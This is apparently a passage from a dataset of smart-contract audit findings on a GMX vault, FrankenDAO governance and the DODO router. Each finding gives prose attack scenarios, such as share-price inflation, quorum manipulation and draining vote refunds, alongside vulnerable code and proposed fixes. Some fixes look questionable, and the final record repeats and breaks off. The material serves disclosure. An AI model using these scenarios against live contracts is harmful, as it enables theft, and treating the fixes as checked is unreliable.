This works for tokens with 6 decimals like USDC, but is completely ineffective for the majority of tokens that aren't.чAdjust minTokenOut to match the decimals of the token:\\n```\\n uint256 minTokenOut = outputGlp.mulDiv(glpPrice * (MAX_BPS - slippageThreshold), tokenPrice * MAX_BPS);\\n+ minTokenOut = minTokenOut * 10 ** (token.decimals() - 6);\\n```\\nчUsers withdrawing tokens other than USDC can suffer huge loss of funds due to virtually no slippage protectionч```\\nfunction _convertToToken(address token, address receiver) internal returns (uint256 amountOut) {\\n // this value should be whatever glp is received by calling withdraw/redeem to junior vault\\n uint256 outputGlp = fsGlp.balanceOf(address(this));\\n\\n // using min price of glp because giving in glp\\n uint256 glpPrice = _getGlpPrice(false);\\n\\n // using max price of token because taking token out of gmx\\n uint256 tokenPrice = gmxVault.getMaxPrice(token);\\n\\n // apply slippage threshold on top of estimated output amount\\n uint256 minTokenOut = outputGlp.mulDiv(glpPrice * (MAX_BPS - slippageThreshold), tokenPrice * MAX_BPS);\\n\\n // will revert if atleast minTokenOut is not received\\n amountOut = rewardRouter.unstakeAndRedeemGlp(address(token), outputGlp, minTokenOut, receiver);\\n}\\n```\\n -WithdrawPeriphery uses incorrect value for MAX_BPS which will allow much higher slippage than intendedчmediumчWithdrawPeriphery accidentally uses an incorrect value for MAX_BPS which will allow for much higher slippage than intended.\\n```\\nuint256 internal constant MAX_BPS = 1000;\\n```\\n\\nBPS is typically 10,000 and using 1000 is inconsistent with the rest of the ecosystem contracts and tests. 
The result is that slippage values will be 10x higher than intended.чCorrect MAX_BPS:\\n```\\n- uint256 internal constant MAX_BPS = 1000;\\n+ uint256 internal constant MAX_BPS = 10_000;\\n```\\nчUnexpected slippage resulting in loss of user funds, likely due to MEVч```\\nuint256 internal constant MAX_BPS = 1000;\\n```\\n -Early depositors to DnGmxSeniorVault can manipulate exchange rates to steal funds from later depositorsчmediumчTo calculate the exchange rate for shares in DnGmxSeniorVault it divides the total supply of shares by the totalAssets of the vault. The first deposit can mint a very small number of shares then donate aUSDC to the vault to grossly manipulate the share price. When later depositor deposit into the vault they will lose value due to precision loss and the adversary will profit.\\n```\\nfunction convertToShares(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivDown(supply, totalAssets());\\n}\\n```\\n\\nShare exchange rate is calculated using the total supply of shares and the totalAsset. This can lead to exchange rate manipulation. As an example, an adversary can mint a single share, then donate 1e8 aUSDC. Minting the first share established a 1:1 ratio but then donating 1e8 changed the ratio to 1:1e8. 
Now any deposit lower than 1e8 (100 aUSDC) will suffer from precision loss and the attackers share will benefit from it.\\nThis same vector is present in DnGmxJuniorVault.чInitialize should include a small deposit, such as 1e6 aUSDC that mints the share to a dead address to permanently lock the exchange rate:\\n```\\n aUsdc.approve(address(pool), type(uint256).max);\\n IERC20(asset).approve(address(pool), type(uint256).max);\\n\\n+ deposit(1e6, DEAD_ADDRESS);\\n```\\nчAdversary can effectively steal funds from later usersч```\\nfunction convertToShares(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply(); // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivDown(supply, totalAssets());\\n}\\n```\\n -The total community voting power is updated incorrectly when a user delegates.чhighчWhen a user delegates their voting power from staked tokens, the total community voting power should be updated. But the update logic is not correct, the the total community voting power could be wrong values.\\n```\\n tokenVotingPower[currentDelegate] -= amount;\\n tokenVotingPower[_delegatee] += amount; \\n\\n // If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\n if (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n // If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n } else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n }\\n```\\n\\nWhen the total community voting power is increased in the first if statement, _delegator's token voting power might be positive already and community voting power might be added to total community voting power before.\\nAlso, currentDelegate's token voting power might be still positive after delegation so we shouldn't remove the communitiy voting power this time.чAdd more 
conditions to check if the msg.sender delegated or not.\n```\n if (_delegator == _delegatee) {\n if(tokenVotingPower[_delegatee] == amount) {\n _updateTotalCommunityVotingPower(_delegator, true);\n }\n if(tokenVotingPower[currentDelegate] == 0) {\n _updateTotalCommunityVotingPower(currentDelegate, false); \n }\n } else if (currentDelegate == _delegator) {\n if(tokenVotingPower[_delegatee] == amount) {\n _updateTotalCommunityVotingPower(_delegatee, true);\n }\n if(tokenVotingPower[_delegator] == 0) {\n _updateTotalCommunityVotingPower(_delegator, false); \n }\n }\n```\nчThe total community voting power can be incorrect.ч```\n tokenVotingPower[currentDelegate] -= amount;\n tokenVotingPower[_delegatee] += amount; \n\n // If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\n if (_delegator == _delegatee) {\n _updateTotalCommunityVotingPower(_delegator, true);\n\n // If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\n } else if (currentDelegate == _delegator) {\n _updateTotalCommunityVotingPower(_delegator, false);\n }\n```\n -Staking#changeStakeTime and changeStakeAmount are problematic given current staking designчmediumчStaking#changeStakeTime and changeStakeAmount allow the locking bonus to be modified. Any change to this value will cause voting imbalance in the system. If changes result in a lower total bonus then existing stakers will be given a permanent advantage over new stakers. 
If the bonus is increased then existing stakers will be at a disadvantage because they will be locked and unable to realize the new staking bonus.\\n```\\nfunction _stakeToken(uint _tokenId, uint _unlockTime) internal returns (uint) {\\n if (_unlockTime > 0) {\\n unlockTime[_tokenId] = _unlockTime;\\n uint fullStakedTimeBonus = ((_unlockTime - block.timestamp) * stakingSettings.maxStakeBonusAmount) / stakingSettings.maxStakeBonusTime;\\n stakedTimeBonus[_tokenId] = _tokenId < 10000 ? fullStakedTimeBonus : fullStakedTimeBonus / 2;\\n }\\n```\\n\\nWhen a token is staked their stakeTimeBonus is stored. This means that any changes to stakingSettings.maxStakeBonusAmount or stakingSettings.maxStakeBonusTime won't affect tokens that are already stored. Storing the value is essential to prevent changes to the values causing major damage to the voting, but it leads to other more subtle issue when it is changed that will put either existing or new stakers at a disadvantage.\\nExample: User A stake when maxStakeBonusAmount = 10 and stake long enough to get the entire bonus. Now maxStakeBonusAmount is changed to 20. User A is unable to unstake their token right away because it is locked. They are now at a disadvantage because other users can now stake and get a bonus of 20 while they are stuck with only a bonus of 10. Now maxStakeBonusAmount is changed to 5. User A now has an advantage because other users can now only stake for a bonus of 5. If User A never unstakes then they will forever have that advantage over new users.чI recommend implementing a poke function that can be called by any user on any user. 
This function should loop through all tokens (or the tokens specified) and recalculate their voting power based on current multipliers, allowing all users to be normalized to prevent any abuse.чVoting power becomes skewed for users when Staking#changeStakeTime and changeStakeAmount are usedч```\\nfunction _stakeToken(uint _tokenId, uint _unlockTime) internal returns (uint) {\\n if (_unlockTime > 0) {\\n unlockTime[_tokenId] = _unlockTime;\\n uint fullStakedTimeBonus = ((_unlockTime - block.timestamp) * stakingSettings.maxStakeBonusAmount) / stakingSettings.maxStakeBonusTime;\\n stakedTimeBonus[_tokenId] = _tokenId < 10000 ? fullStakedTimeBonus : fullStakedTimeBonus / 2;\\n }\\n```\\n -Adversary can abuse delegating to lower quorumчmediumчWhen a user delegates to another user they surrender their community voting power. The quorum threshold for a vote is determined when it is created. Users can artificially lower quorum by delegating to other users then creating a proposal. After it's created they can self delegate and regain all their community voting power to reach quorum easier.\\n```\\n// If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\nif (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n// If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n} else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n}\\n```\\n\\nWhen a user delegates to user other than themselves, they forfeit their community votes and lowers the total number of votes. 
When they self delegate again they will recover all their community voting power.\\n```\\n newProposal.id = newProposalId.toUint96();\\n newProposal.proposer = msg.sender;\\n newProposal.targets = _targets;\\n newProposal.values = _values;\\n newProposal.signatures = _signatures;\\n newProposal.calldatas = _calldatas;\\n\\n //@audit quorum votes locked at creation\\n\\n newProposal.quorumVotes = quorumVotes().toUint24();\\n newProposal.startTime = (block.timestamp + votingDelay).toUint32();\\n newProposal.endTime = (block.timestamp + votingDelay + votingPeriod).toUint32();\\n```\\n\\nWhen a proposal is created the quorum is locked at the time at which it's created. Users can combine these two quirks to abuse the voting.\\nExample:\\nAssume there is 1000 total votes and quorum is 20%. Assume 5 users each have 35 votes, 10 base votes and 25 community votes. In this scenario quorum is 200 votes which they can't achieve. Each user delegates to other users, reducing each of their votes by 25 and reducing the total number of votes of 875. Now they can create a proposal and quorum will now be 175 votes (875*20%). They all self delegate and recover their community votes. Now they can reach quorum and pass their proposal.чOne solution would be to add a vote cooldown to users after they delegate, long enough to make sure all active proposals have expired before they're able to vote. 
The other option would be to implement checkpoints.чUsers can collude to lower quorum and pass proposal easierч```\\n// If a user is delegating back to themselves, they regain their community voting power, so adjust totals up\\nif (_delegator == _delegatee) {\\n _updateTotalCommunityVotingPower(_delegator, true);\\n\\n// If a user delegates away their votes, they forfeit their community voting power, so adjust totals down\\n} else if (currentDelegate == _delegator) {\\n _updateTotalCommunityVotingPower(_delegator, false);\\n}\\n```\\n -castVote can be called by anyone even those without votesчmediumчGovernance#castVote can be called by anyone, even users that don't have any votes. Since the voting refund is per address, an adversary could use a large number of addresses to vote with zero votes to drain the vault.\\n```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n 
receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n\\nNowhere in the flow of voting does the function revert if the user calling it doesn't actually have any votes. staking#getVotes won't revert under any circumstances. Governance#_castVote only reverts if 1) the proposal isn't active 2) support > 2 or 3) if the user has already voted. The result is that any user can vote even if they don't have any votes, allowing users to maliciously burn vault funds by voting and claiming the vote refund.чGovernance#_castVote should revert if msg.sender doesn't have any votes:\\n```\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n+ if (votes == 0) revert NoVotes();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n```\\nчVault can be drained maliciously by users with no votesч```\\nfunction _castVote(address _voter, uint256 _proposalId, uint8 _support) internal returns (uint) {\\n // Only Active proposals can be voted on\\n if (state(_proposalId) != ProposalState.Active) revert InvalidStatus();\\n \\n // Only valid values for _support are 0 (against), 1 (for), and 2 (abstain)\\n if (_support > 2) revert InvalidInput();\\n\\n Proposal storage proposal = proposals[_proposalId];\\n\\n // If the voter has already 
voted, revert \\n Receipt storage receipt = proposal.receipts[_voter];\\n if (receipt.hasVoted) revert AlreadyVoted();\\n\\n // Calculate the number of votes a user is able to cast\\n // This takes into account delegation and community voting power\\n uint24 votes = (staking.getVotes(_voter)).toUint24();\\n\\n // Update the proposal's total voting records based on the votes\\n if (_support == 0) {\\n proposal.againstVotes = proposal.againstVotes + votes;\\n } else if (_support == 1) {\\n proposal.forVotes = proposal.forVotes + votes;\\n } else if (_support == 2) {\\n proposal.abstainVotes = proposal.abstainVotes + votes;\\n }\\n\\n // Update the user's receipt for this proposal\\n receipt.hasVoted = true;\\n receipt.support = _support;\\n receipt.votes = votes;\\n\\n // Make these updates after the vote so it doesn't impact voting power for this vote.\\n ++totalCommunityScoreData.votes;\\n\\n // We can update the total community voting power with no check because if you can vote, \\n // it means you have votes so you haven't delegated.\\n ++userCommunityScoreData[_voter].votes;\\n\\n return votes;\\n}\\n```\\n -[Tomo-M3] Use safeMint instead of mint for ERC721чmediumчUse safeMint instead of mint for ERC721\\nThe `msg.sender` will be minted as a proof of staking NFT when `_stakeToken()` is called.\\nHowever, if `msg.sender` is a contract address that does not support ERC721, the NFT can be frozen in the contract.\\nAs per the documentation of EIP-721:\\nA wallet/broker/auction application MUST implement the wallet interface if it will accept safe transfers.\\nAs per the documentation of ERC721.sol by Openzeppelin\\n```\\n/**\\n * @dev Mints `tokenId` and transfers it to `to`.\\n *\\n * WARNING: Usage of this method is discouraged, use {_safeMint} whenever possible\\n *\\n * Requirements:\\n *\\n * - `tokenId` must not exist.\\n * - `to` cannot be the zero address.\\n *\\n * Emits a {Transfer} event.\\n */\\nfunction _mint(address to, uint256 tokenId) internal 
virtual {\\n```\\nчUse `safeMint` instead of `mint` to check received address support for ERC721 implementation.чUsers possibly lose their NFTsч```\\n/**\\n * @dev Mints `tokenId` and transfers it to `to`.\\n *\\n * WARNING: Usage of this method is discouraged, use {_safeMint} whenever possible\\n *\\n * Requirements:\\n *\\n * - `tokenId` must not exist.\\n * - `to` cannot be the zero address.\\n *\\n * Emits a {Transfer} event.\\n */\\nfunction _mint(address to, uint256 tokenId) internal virtual {\\n```\\n -[Medium-1] Hardcoded `monsterMultiplier` in case of `stakedTimeBonus` disregards the updates done to `monsterMultiplier` through `setMonsterMultiplier()`чmediumч[Medium-1] Hardcoded `monsterMultiplier` in case of `stakedTimeBonus` disregards the updates done to `monsterMultiplier` through `setMonsterMultiplier()`\\nFrankenDAO allows users to stake two types of NFTs, `Frankenpunks` and `Frankenmonsters` , one of which is considered more valuable, ie: `Frankenpunks`,\\nThis is achieved by reducing votes applicable for `Frankenmonsters` by `monsterMultiplier`.\\n```\\nfunction getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? 
PERCENT : monsterMultiplier;\\n \\n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\\n }\\n```\\n\\nThis `monsterMultiplier` is initially set as 50 and could be changed by governance proposal.\\n```\\nfunction setMonsterMultiplier(uint _monsterMultiplier) external onlyExecutor {\\n emit MonsterMultiplierChanged(monsterMultiplier = _monsterMultiplier); \\n }\\n```\\n\\nHowever, one piece of code inside the FrakenDAO staking contract doesn't consider this and has a monster multiplier hardcoded.\\n```\\nfunction stake(uint[] calldata _tokenIds, uint _unlockTime) \\n----\\nfunction _stakeToken(uint _tokenId, uint _unlockTime) internal returns (uint) {\\n if (_unlockTime > 0) {\\n --------\\n stakedTimeBonus[_tokenId] = _tokenId < 10000 ? **fullStakedTimeBonus : fullStakedTimeBonus / 2;** \\n }\\n--------\\n```\\n\\nHence any update done to `monsterMultiplier` would not reflect in the calculation of `stakedTimeBonus`, and thereby votes.чConsider replacing the hardcoded value with monsterMultiplierчAny update done to monsterMultiplier would not be reflected in stakedTimeBonus; it would always remain as /2 or 50%.\\nLikelihood: Medium\\nOne needs to pass a governance proposal to change the monster multiplier, so this is definitely not a high likelihood; it's not low as well, as there is a clear provision in spec regarding this.ч```\\nfunction getTokenVotingPower(uint _tokenId) public override view returns (uint) {\\n if (ownerOf(_tokenId) == address(0)) revert NonExistentToken();\\n\\n // If tokenId < 10000, it's a FrankenPunk, so 100/100 = a multiplier of 1\\n uint multiplier = _tokenId < 10_000 ? 
PERCENT : monsterMultiplier;\n \n // evilBonus will return 0 for all FrankenMonsters, as they are not eligible for the evil bonus\n return ((baseVotes * multiplier) / PERCENT) + stakedTimeBonus[_tokenId] + evilBonus(_tokenId);\n }\n```\n -`getCommunityVotingPower` doesn't calculate voting Power correctly due to precision lossчmediumчIn `Staking.sol`, the getCommunityVotingPower function, doesn't calculate the votes correctly due to precision loss.\nIn getCommunityVotingPower function, the `return` statement is where the mistake lies in:\n```\n return \n (votes * cpMultipliers.votes / PERCENT) + \n (proposalsCreated * cpMultipliers.proposalsCreated / PERCENT) + \n (proposalsPassed * cpMultipliers.proposalsPassed / PERCENT);\n```\n\nHere, after each multiplication by the `Multipliers`, we immediately divide it by `PERCENT`. Every time we do a division, there is a certain amount of precision loss. And when its done thrice, the loss just accumulates. So instead, the division by `PERCENT` should be done after all 3 terms are added together.\nNote that this loss is not there, if the `Multipliers` are a multiple of `PERCENT`. But these values can be changed through governance later. So its better to be careful assuming that they may not always be a multiple of `PERCENT`.чDo the division once after all terms are added together:\n```\n return \n ( (votes * cpMultipliers.votes) + \n (proposalsCreated * cpMultipliers.proposalsCreated) + \n (proposalsPassed * cpMultipliers.proposalsPassed) ) / PERCENT;\n }\n```\nчThe community voting power of the user is calculated wrongly.ч```\n return \n (votes * cpMultipliers.votes / PERCENT) + \n (proposalsCreated * cpMultipliers.proposalsCreated / PERCENT) + \n (proposalsPassed * cpMultipliers.proposalsPassed / PERCENT);\n```\n -Delegate can keep delegatee trapped indefinitelyчmediumчUsers are allowed to delegate their votes to other users. 
Since staking does not implement checkpoints, users are not allowed to delegate or unstake during an active proposal if their delegate has already voted. A malicious delegate can abuse this by creating proposals so that there is always an active proposal and their delegatees are always locked to them.\n```\nmodifier lockedWhileVotesCast() {\n uint[] memory activeProposals = governance.getActiveProposals();\n for (uint i = 0; i < activeProposals.length; i++) {\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\n }\n _;\n}\n```\n\nThe above modifier is applied when unstaking or delegating. This reverts if the delegate of msg.sender either has voted or currently has an open proposal. The result is that under those conditions, the delegatee cannot unstake or delegate. A malicious delegate can abuse these conditions to keep their delegatees forever delegated to them. They would keep opening proposals so that delegatees could never unstake or delegate. A single user can only have one proposal opened at the same time so they would use a secondary account to alternate and always keep an active proposal.чThere should be a function to emergency eject the token from staking. 
To prevent abuse a token that has been emergency ejected should be blacklisted from staking again for a certain cooldown period, such as the length of current voting period.чDelegatees can never unstake or delegate to anyone elseч```\\nmodifier lockedWhileVotesCast() {\\n uint[] memory activeProposals = governance.getActiveProposals();\\n for (uint i = 0; i < activeProposals.length; i++) {\\n if (governance.getReceipt(activeProposals[i], getDelegate(msg.sender)).hasVoted) revert TokenLocked();\\n (, address proposer,) = governance.getProposalData(activeProposals[i]);\\n if (proposer == getDelegate(msg.sender)) revert TokenLocked();\\n }\\n _;\\n}\\n```\\n -Rounding error when call function `dodoMultiswap()` can lead to revert of transaction or fund of userчmediumчThe calculation of the proportion when do the split swap in function `_multiSwap` doesn't care about the rounding error\\nThe amount of `midToken` will be transfered to the each adapter can be calculated by formula `curAmount = curTotalAmount * weight / totalWeight`\\n```\\nif (assetFrom[i - 1] == address(this)) {\\n uint256 curAmount = curTotalAmount * curPoolInfo.weight / curTotalWeight;\\n\\n\\n if (curPoolInfo.poolEdition == 1) {\\n //For using transferFrom pool (like dodoV1, Curve), pool call transferFrom function to get tokens from adapter\\n IERC20(midToken[i]).transfer(curPoolInfo.adapter, curAmount);\\n } else {\\n //For using transfer pool (like dodoV2), pool determine swapAmount through balanceOf(Token) - reserve\\n IERC20(midToken[i]).transfer(curPoolInfo.pool, curAmount);\\n }\\n}\\n```\\n\\nIt will lead to some scenarios when `curTotalAmount * curPoolInfo.weight` is not divisible by `curTotalWeight`, there will be some token left after the swap.\\nFor some tx, if user set a `minReturnAmount` strictly, it may incur the reversion. 
For some token with small decimal and high value, it can make a big loss for the sender.чAdd a accumulation variable to maintain the total amount is transfered after each split swap. In the last split swap, instead of calculating the `curAmount` by formula above, just take the remaining amount to swap.чRevert the transaction because not enough amount of `toToken`\\nSender can lose a small amount of tokensч```\\nif (assetFrom[i - 1] == address(this)) {\\n uint256 curAmount = curTotalAmount * curPoolInfo.weight / curTotalWeight;\\n\\n\\n if (curPoolInfo.poolEdition == 1) {\\n //For using transferFrom pool (like dodoV1, Curve), pool call transferFrom function to get tokens from adapter\\n IERC20(midToken[i]).transfer(curPoolInfo.adapter, curAmount);\\n } else {\\n //For using transfer pool (like dodoV2), pool determine swapAmount through balanceOf(Token) - reserve\\n IERC20(midToken[i]).transfer(curPoolInfo.pool, curAmount);\\n }\\n}\\n```\\n -Issue when handling native ETH trade and WETH trade in DODO RouterProxy#externalSwapчmediumчLack of logic to wrap the native ETH to WETH in function externalSwap\\nThe function exeternalSwap can handle external swaps with 0x, 1inch and paraswap or other external resources.\\n```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], \"DODORouteProxy: Not Whitelist Contract\"); \\n require(isApproveWhiteListedContract[approveTarget], \"DODORouteProxy: Not Whitelist Appprove Contract\"); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n 
IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\n fromToken,\n msg.sender,\n address(this),\n fromTokenAmount\n );\n }\n\n // swap\n uint256 toTokenOriginBalance;\n if(toToken != _ETH_ADDRESS_) {\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\n } else {\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\n }\n```\n\nnote the code above, if the fromToken is set to _ETH_ADDRESS, indicating the user wants to trade with native ETH pair. the function does have a payable modifier and the user can send ETH along when calling this function.\nHowever, the toTokenOriginBalance check only reads the WETH balance instead of the ETH balance.\n```\n if(toToken != _ETH_ADDRESS_) {\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\n } else {\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\n }\n```\n\nThen we do the swap:\n```\n(bool success, bytes memory result) = swapTarget.call{\n value: fromToken == _ETH_ADDRESS_ ? 
fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nIf the fromToken is _ETH_ADDRESS, we send the user supplied fromTokenAmount without verifying that the fromTokenAmount.\\nFinally, we use the before and after balance to get the amount with received.\\n```\\n// calculate toToken amount\\n if(toToken != _ETH_ADDRESS_) {\\n receiveAmount = IERC20(toToken).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n } else {\\n receiveAmount = IERC20(_WETH_).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n }\\n```\\n\\nWe are checking the WETH amount instead of ETH amount again.\\nThe issue is that some trades may settle the trade in native ETH, for example\\nwe can look into the Paraswap contract\\nIf we click the implementation contract and see the method swapOnUniswapV2Fork\\nCode line 927 - 944, which calls the function\\n```\\nfunction swapOnUniswapV2Fork(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] calldata pools\\n)\\n external\\n payable\\n{\\n _swap(\\n tokenIn,\\n amountIn,\\n amountOutMin,\\n weth,\\n pools\\n );\\n}\\n```\\n\\nwhich calls:\\n```\\n function _swap(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] memory pools\\n )\\n private\\n returns (uint256 tokensBought)\\n {\\n uint256 pairs = pools.length;\\n\\n require(pairs != 0, \"At least one pool required\");\\n\\n bool tokensBoughtEth;\\n\\n if (tokenIn == ETH_IDENTIFIER) {\\n require(amountIn == msg.value, \"Incorrect msg.value\");\\n IWETH(weth).deposit{value: msg.value}();\\n require(IWETH(weth).transfer(address(pools[0]), msg.value));\\n } else {\\n require(msg.value == 0, \"Incorrect msg.value\");\\n transferTokens(tokenIn, msg.sender, address(pools[0]), amountIn);\\n tokensBoughtEth = weth != address(0);\\n }\\n\\n tokensBought = amountIn;\\n\\n for (uint256 i = 0; i < pairs; ++i) {\\n uint256 p = pools[i];\\n address pool = address(p);\\n bool direction = p & 
DIRECTION_FLAG == 0;\n\n tokensBought = NewUniswapV2Lib.getAmountOut(\n tokensBought, pool, direction, p >> FEE_OFFSET\n );\n (uint256 amount0Out, uint256 amount1Out) = direction\n ? (uint256(0), tokensBought) : (tokensBought, uint256(0));\n IUniswapV2Pair(pool).swap(\n amount0Out,\n amount1Out,\n i + 1 == pairs\n ? (tokensBoughtEth ? address(this) : msg.sender)\n : address(pools[i + 1]),\n ""\n );\n }\n\n if (tokensBoughtEth) {\n IWETH(weth).withdraw(tokensBought);\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\n }\n\n require(tokensBought >= amountOutMin, "UniswapV2Router: INSUFFICIENT_OUTPUT_AMOUNT");\n }\n```\n\nas we can clearly see, the code first receives ETH, wraps the ETH to WETH, then in the end unwraps the WETH back to ETH and sends the ETH back to complete the trade.\n```\nif (tokensBoughtEth) {\n IWETH(weth).withdraw(tokensBought);\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\n}\n```\n\nIn DODORouterProxy.sol#ExternalSwap however, we are using WETH balance before and after to check the received amount,\nbut if we call swapOnUniswapV2Fork on Paraswap router, the balance change for WETH would be 0\nbecause as we see above, the method on the paraswap side wraps ETH to WETH but in the end unwraps WETH and sends ETH back.\n```\nif (tokensBoughtEth) {\n IWETH(weth).withdraw(tokensBought);\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\n}\n```\n\nThere is also a lack of a method to wrap the ETH to WETH before the trade. 
making the ETH-related order not tradeable.чIssue Issue when handling native ETH trade and WETH trade in DODO RouterProxy#externalSwap\\nWe recommend the project change from\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_ETH_ADDRESS).universalBalanceOf(address(this));\\n }\\n```\\n\\nIf we want to use WETH to do the balance check, we can help the user wrap the ETH to WETH by calling before do the balance check.\\n```\\nIWETH(_WETH_).deposit(receiveAmount);\\n```\\n\\nIf we want to use WETH as the reference to trade, we also need to approve external contract to spend our WETH.\\nWe can add\\n```\\nif(fromToken == _ETH_ADDRESS) {\\n IERC20(_WETH_).universalApproveMax(approveTarget, fromTokenAmount);\\n}\\n```\\n\\nWe also need to verify the fromTokenAmount for\\n```\\n(bool success, bytes memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? 
fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nwe can add the check:\\n```\\nrequire(msg.value == fromTokenAmount, \"invalid ETH amount\");\\n```\\nчA lot of method that does not use WETH to settle the trade will not be callable.ч```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], \"DODORouteProxy: Not Whitelist Contract\"); \\n require(isApproveWhiteListedContract[approveTarget], \"DODORouteProxy: Not Whitelist Appprove Contract\"); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n -Issue when handling native ETH trade and WETH trade in DODO RouterProxy#externalSwapчmediumчLack of logic to wrap the native ETH to WETH in function externalSwap\\nThe function exeternalSwap can handle external swaps with 0x, 1inch and paraswap or other external resources.\\n```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable 